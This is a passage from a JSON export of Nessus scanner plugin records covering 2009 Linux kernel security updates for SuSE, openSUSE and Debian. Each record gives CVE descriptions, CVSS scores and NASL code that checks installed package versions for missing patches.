to cause a denial of service (memory corruption) by selecting a small number of 3-byte UTF-8 characters, which triggers an an off-by-two memory error. It is is not clear if this can be exploited at all. (CVE-2009-1046)\n\nAlso a huge number of regular bugs were fixed, please see the RPM changelog for full details.", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 6109)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1294", "CVE-2009-0028", "CVE-2009-0065", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-1046"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-6109.NASL", "href": "https://www.tenable.com/plugins/nessus/41538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41538);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1294\", \"CVE-2009-0028\", \"CVE-2009-0065\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-1046\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 6109)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 10 Service Pack 2\nfixes various bugs and several security issues.\n\nThe following security issues were fixed: CVE-2009-0675: The\nskfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux kernel\npermits SKFP_CLR_STATS requests only when the CAP_NET_ADMIN capability\nis absent, instead of when this capability is present, which allows\nlocal users to reset the driver statistics, related to an 'inverted\nlogic' issue.\n\n - The sock_getsockopt function in net/core/sock.c in the\n Linux kernel does not initialize a certain structure\n member, which allows local users to obtain potentially\n sensitive information from kernel memory via an\n SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)\n\n - The clone system call in the Linux kernel allows local\n users to send arbitrary signals to a parent process from\n an unprivileged child process by launching an additional\n child process with the CLONE_PARENT flag, and then\n letting this new process exit. (CVE-2009-0028)\n\n - The Linux kernel does not check when a user attempts to\n set RLIMIT_CPU to 0 until after the change is made,\n which allows local users to bypass intended resource\n limits. (CVE-2008-1294)\n\n - Buffer overflow in net/sctp/sm_statefuns.c in the Stream\n Control Transmission Protocol (sctp) implementation in\n the Linux kernel allows remote attackers to have an\n unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk\n with a large stream ID. (CVE-2009-0065)\n\n - The console selection feature in the Linux kernel when\n the UTF-8 console is used, allows physically proximate\n attackers to cause a denial of service (memory\n corruption) by selecting a small number of 3-byte UTF-8\n characters, which triggers an an off-by-two memory\n error. It is is not clear if this can be exploited at\n all. (CVE-2009-1046)\n\nAlso a huge number of regular bugs were fixed, please see the RPM\nchangelog for full details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1294.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0065.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0675.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0676.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1046.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6109.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 119, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-default-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-smp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-source-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-syms-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-xen-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-debug-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-default-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-kdump-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-smp-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-source-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-syms-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-vmi-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-vmipae-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-xen-2.6.16.60-0.37_f594963d\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.60-0.37_f594963d\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:07:46", "description": "This kernel update for openSUSE 11.0 fixes some bugs and several security problems.\n\nThe following security issues are fixed: CVE-2009-2692: A missing NULL pointer check in the socket sendpage function can be used by local attackers to gain root privileges.\n\nCVE-2009-2406: A kernel stack overflow when mounting eCryptfs filesystems in parse_tag_11_packet() was fixed. Code execution might be possible of ecryptfs is in use.\n\nCVE-2009-2407: A kernel heap overflow when mounting eCryptfs filesystems in parse_tag_3_packet() was fixed. Code execution might be possible of ecryptfs is in use.\n\nThe compiler option -fno-delete-null-pointer-checks was added to the kernel build, and the -fwrapv compiler option usage was fixed to be used everywhere. This works around the compiler removing checks too aggressively.\n\nCVE-2009-1389: A crash in the r8169 driver when receiving large packets was fixed. This is probably exploitable only in the local network.\n\nCVE-2009-1895: Personality flags on set*id were not cleared correctly, so ASLR and NULL page protection could be bypassed.\n\nCVE-2009-1046: A utf-8 console memory corruption that can be used for local privilege escalation was fixed.\n\nThe NULL page protection using mmap_min_addr was enabled (was disabled before).\n\nNo CVE yet: A sigaltstack kernel memory disclosure was fixed.\n\nCVE-2008-5033: A local denial of service (Oops) in video4linux tvaudio was fixed.\n\nCVE-2009-1385: A Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size.", "cvss3": {}, "published": "2009-08-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kernel (kernel-1211)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5033", "CVE-2009-1046", "CVE-2009-1385", "CVE-2009-1389", "CVE-2009-1895", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-2692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acerhk-kmp-debug", "p-cpe:/a:novell:opensuse:acx-kmp-debug", "p-cpe:/a:novell:opensuse:appleir-kmp-debug", "p-cpe:/a:novell:opensuse:at76_usb-kmp-debug", "p-cpe:/a:novell:opensuse:atl2-kmp-debug", "p-cpe:/a:novell:opensuse:aufs-kmp-debug", "p-cpe:/a:novell:opensuse:dazuko-kmp-debug", "p-cpe:/a:novell:opensuse:drbd-kmp-debug", "p-cpe:/a:novell:opensuse:gspcav-kmp-debug", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-debug", "p-cpe:/a:novell:opensuse:ivtv-kmp-debug", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kqemu-kmp-debug", "p-cpe:/a:novell:opensuse:nouveau-kmp-debug", "p-cpe:/a:novell:opensuse:omnibook-kmp-debug", "p-cpe:/a:novell:opensuse:pcc-acpi-kmp-debug", "p-cpe:/a:novell:opensuse:pcfclock-kmp-debug", "p-cpe:/a:novell:opensuse:tpctl-kmp-debug", "p-cpe:/a:novell:opensuse:uvcvideo-kmp-debug", "p-cpe:/a:novell:opensuse:virtualbox-ose-kmp-debug", "p-cpe:/a:novell:opensuse:vmware-kmp-debug", "p-cpe:/a:novell:opensuse:wlan-ng-kmp-debug", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_KERNEL-090814.NASL", "href": "https://www.tenable.com/plugins/nessus/40783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-1211.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40783);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5033\", \"CVE-2009-1046\", \"CVE-2009-1385\", \"CVE-2009-1389\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-2692\");\n\n script_name(english:\"openSUSE Security Update : kernel (kernel-1211)\");\n script_summary(english:\"Check for the kernel-1211 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update for openSUSE 11.0 fixes some bugs and several\nsecurity problems.\n\nThe following security issues are fixed: CVE-2009-2692: A missing NULL\npointer check in the socket sendpage function can be used by local\nattackers to gain root privileges.\n\nCVE-2009-2406: A kernel stack overflow when mounting eCryptfs\nfilesystems in parse_tag_11_packet() was fixed. Code execution might\nbe possible of ecryptfs is in use.\n\nCVE-2009-2407: A kernel heap overflow when mounting eCryptfs\nfilesystems in parse_tag_3_packet() was fixed. Code execution might be\npossible of ecryptfs is in use.\n\nThe compiler option -fno-delete-null-pointer-checks was added to the\nkernel build, and the -fwrapv compiler option usage was fixed to be\nused everywhere. This works around the compiler removing checks too\naggressively.\n\nCVE-2009-1389: A crash in the r8169 driver when receiving large\npackets was fixed. This is probably exploitable only in the local\nnetwork.\n\nCVE-2009-1895: Personality flags on set*id were not cleared correctly,\nso ASLR and NULL page protection could be bypassed.\n\nCVE-2009-1046: A utf-8 console memory corruption that can be used for\nlocal privilege escalation was fixed.\n\nThe NULL page protection using mmap_min_addr was enabled (was disabled\nbefore).\n\nNo CVE yet: A sigaltstack kernel memory disclosure was fixed.\n\nCVE-2008-5033: A local denial of service (Oops) in video4linux tvaudio\nwas fixed.\n\nCVE-2009-1385: A Integer underflow in the e1000_clean_rx_irq function\nin drivers/net/e1000/e1000_main.c in the e1000 driver the e1000e\ndriver in the Linux kernel, and Intel Wired Ethernet (aka e1000)\nbefore 7.5.5 allows remote attackers to cause a denial of service\n(panic) via a crafted frame size.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=444982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=474549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=478462\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=478699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=503870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=509822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=511243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=521427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=522686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=522914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=523719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=527848\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=530151\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel Sendpage Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acerhk-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acx-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:appleir-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:at76_usb-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:atl2-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:aufs-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dazuko-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:drbd-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gspcav-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ivtv-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kqemu-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nouveau-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:omnibook-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcc-acpi-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tpctl-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:uvcvideo-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-ose-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vmware-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wlan-ng-kmp-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acerhk-kmp-debug-0.5.35_2.6.25.20_0.5-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acx-kmp-debug-20080210_2.6.25.20_0.5-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"appleir-kmp-debug-1.1_2.6.25.20_0.5-108.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"at76_usb-kmp-debug-0.17_2.6.25.20_0.5-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"atl2-kmp-debug-2.0.4_2.6.25.20_0.5-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"aufs-kmp-debug-cvs20080429_2.6.25.20_0.5-13.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dazuko-kmp-debug-2.3.4.4_2.6.25.20_0.5-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"drbd-kmp-debug-8.2.6_2.6.25.20_0.5-0.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"gspcav-kmp-debug-01.00.20_2.6.25.20_0.5-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"iscsitarget-kmp-debug-0.4.15_2.6.25.20_0.5-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ivtv-kmp-debug-1.0.3_2.6.25.20_0.5-66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-debug-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-default-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-pae-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-source-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-syms-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-vanilla-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kernel-xen-2.6.25.20-0.5\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"kqemu-kmp-debug-1.3.0pre11_2.6.25.20_0.5-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"nouveau-kmp-debug-0.10.1.20081112_2.6.25.20_0.5-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"omnibook-kmp-debug-20080313_2.6.25.20_0.5-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"pcc-acpi-kmp-debug-0.9_2.6.25.20_0.5-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"pcfclock-kmp-debug-0.44_2.6.25.20_0.5-207.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"tpctl-kmp-debug-4.17_2.6.25.20_0.5-189.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"uvcvideo-kmp-debug-r200_2.6.25.20_0.5-2.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"virtualbox-ose-kmp-debug-1.5.6_2.6.25.20_0.5-33.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"vmware-kmp-debug-2008.04.14_2.6.25.20_0.5-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"wlan-ng-kmp-debug-0.2.8_2.6.25.20_0.5-107.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acerhk-kmp-debug / acx-kmp-debug / appleir-kmp-debug / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:01:13", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, privilege escalation or a sensitive memory leak. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2009-0028 Chris Evans discovered a situation in which a child process can send an arbitrary signal to its parent.\n\n - CVE-2009-0834 Roland McGrath discovered an issue on amd64 kernels that allows local users to circumvent system call audit configurations which filter based on the syscall numbers or argument details.\n\n - CVE-2009-0835 Roland McGrath discovered an issue on amd64 kernels with CONFIG_SECCOMP enabled. By making a specially crafted syscall, local users can bypass access restrictions.\n\n - CVE-2009-0859 Jiri Olsa discovered that a local user can cause a denial of service (system hang) using a SHM_INFO shmctl call on kernels compiled with CONFIG_SHMEM disabled.\n This issue does not affect prebuilt Debian kernels.\n\n - CVE-2009-1046 Mikulas Patocka reported an issue in the console subsystem that allows a local user to cause memory corruption by selecting a small number of 3-byte UTF-8 characters.\n\n - CVE-2009-1072 Igor Zhbanov reported that nfsd was not properly dropping CAP_MKNOD, allowing users to create device nodes on file systems exported with root_squash.\n\n - CVE-2009-1184 Dan Carpenter reported a coding issue in the selinux subsystem that allows local users to bypass certain networking checks when running with compat_net=1.\n\n - CVE-2009-1192 Shaohua Li reported an issue in the AGP subsystem they may allow local users to read sensitive kernel memory due to a leak of uninitialized memory.\n\n - CVE-2009-1242 Benjamin Gilbert reported a local denial of service vulnerability in the KVM VMX implementation that allows local users to trigger an oops.\n\n - CVE-2009-1265 Thomas Pollet reported an overflow in the af_rose implementation that allows remote attackers to retrieve uninitialized kernel memory that may contain sensitive data.\n\n - CVE-2009-1337 Oleg Nesterov discovered an issue in the exit_notify function that allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.\n\n - CVE-2009-1338 Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to reach processes outside of the current process namespace.\n\n - CVE-2009-1439 Pavan Naregundi reported an issue in the CIFS filesystem code that allows remote users to overwrite memory via a long nativeFileSystem field in a Tree Connect response during mount.", "cvss3": {}, "published": "2009-05-18T00:00:00", "type": "nessus", "title": "Debian DSA-1800-1 : linux-2.6 - denial of service/privilege escalation/sensitive memory leak", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0028", "CVE-2009-0834", "CVE-2009-0835", "CVE-2009-0859", "CVE-2009-1046", "CVE-2009-1072", "CVE-2009-1184", "CVE-2009-1192", "CVE-2009-1242", "CVE-2009-1265", "CVE-2009-1337", "CVE-2009-1338", "CVE-2009-1439"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-2.6", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-1800.NASL", "href": "https://www.tenable.com/plugins/nessus/38795", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security 